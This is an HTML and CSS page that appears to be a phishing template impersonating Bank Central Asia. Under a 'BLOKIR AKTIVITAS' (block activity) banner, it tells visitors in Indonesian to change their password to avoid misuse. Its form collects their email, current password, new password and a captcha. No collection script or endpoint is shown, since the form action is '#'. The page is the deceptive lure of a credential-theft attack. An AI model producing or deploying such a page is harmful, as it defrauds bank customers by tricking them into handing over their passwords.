<!DOCTYPE html>
<html>

<head>
    <style>
        body {
            margin: 0px;
            font-family: 'Lato', sans-serif;
            overflow-x: hidden;
        }

        .header__logo {
            padding: 30px;
        }

        .header__logo>.img {
            width: 200px;
        }

        .header__title {
            background-color: #025caa;
            width: 100%;
            padding: 30px;
            text-align: center;
        }

        .header__title>.text {
            color: white;
            margin: auto;
        }

        .content {
            display: flex;
            flex-direction: column;
        }

        .content__title {
            margin-top: 40px;
            display: flex;
            justify-content: center;
            font-size: 15px;
            text-align: center;

        }

        .content__form {
            display: flex;
            flex-direction: column;
            align-items: center;
            margin-top: 25px;
            font-size: 13px;
            line-height: 1.75;
        }

        .form__group {
            display: flex;
            flex-direction: row;
            align-items: center;
        }

        .form__label {
            min-width: 175px;
            font-weight: bolder;
        }

        .form__input {
            display: flex;
            align-items: center;
        }

        .input {
            padding: 8px;
            width: 400px;
            margin-left: 5px;
            background-color: #dadada;
            border: 1px solid #b3b3b3;
            margin-top: 10px;
            margin-bottom: 10px;
        }

        .captcha {
            display: flex;
            width: 420px;
            align-items: center;
            margin: 20px 0px;
        }

        .captcha__input {
            padding: 10px;
            margin: 0px 5px;
        }

        .captcha__img {
            height: 35px;
        }

        .button__submit {
            background: #253fc7;
            border-radius: 25px;
            color: white;
            border: none;
            padding: 10px 50px;
            margin-top: 10px;
            margin-left: -100px;
            cursor: pointer;
        }

        .button__submit:hover {
            filter: brightness(70%);
        }


        @media screen and (max-width: 992px) {
            .content__title {
                margin-top: 40px;
                font-size: 25px;
                padding: 0px 100px;
            }

            .form__group {
                flex-direction: column;
                align-items: flex-start;
            }

            .form__label {
                font-size: 30px;
            }

            .input {
                padding: 0px;
                width: 550px;
                height: 50px;
                font-size: 30px;
            }

            .captcha {
                flex-direction: column;
            }

            .captcha__input {
                padding: 0px;
                width: 550px;
                height: 50px;
                font-size: 30px;
            }


            .captcha__img {
                margin-top: 20px;
                height: 100%;
            }

            .button__submit {
                padding: 0px;
                margin-left: 0px;
                font-size: 20px;
                width: 400px;
                height: 50px;
            }
        }
    </style>
</head>

<body>
    <div class="header">
        <div class="header__logo">
            <img src="./assets/BCA_logo_Bank_Central_Asia.png" alt="logo" class="img" />
        </div>
        <div class="header__title">
            <h1 class="text">BLOKIR AKTIVITAS</h1>
        </div>
    </div>
    <div class="content">
        <div class="content__title">
            Untuk mengindari penyalahgunaan email kamu, ubah password
            <br /> dengan mengisi data di bawah ini:
        </div>
        <form action="#">
            <div class="content__form">
                <div class="form__group">
                    <div class="form__label">Email</div>
                    <div class="form__input">
                        <span>:</span>
                        <input class="input" type="text" name="email" />
                    </div>
                </div>
                <div class="form__group">
                    <div class="form__label">Current Password</div>
                    <div class="form__input">
                        <span>:</span>
                        <input class="input" type="password" name="password" />
                    </div>
                </div>
                <div class="form__group">
                    <div class="form__label">New Password</div>
                    <div class="form__input">
                        <span>:</span>
                        <input class="input" type="password" name="newPassword" />
                    </div>
                </div>
                <div class="form__group">
                    <div class="form__label">Confirm New Password</div>
                    <div class="form__input">
                        <span>:</span>
                        <input class="input" type="password" name="confirmNewPassword" />
                    </div>
                </div>
                <div class="form__group">
                    <div class="form__label">&nbsp;</div>
                    <div class="form__input">
                        <div class="captcha">
                            <input class="captcha__input" type="text" name="captcha" />
                            <img class="captcha__img" src="./assets/asset_7.png" alt="captcha" class="captcha__img" />
                        </div>
                    </div>
                </div>
                <button type="submit" class="button__submit">Submit</button>
            </div>
        </form>
    </div>
</body>

</html>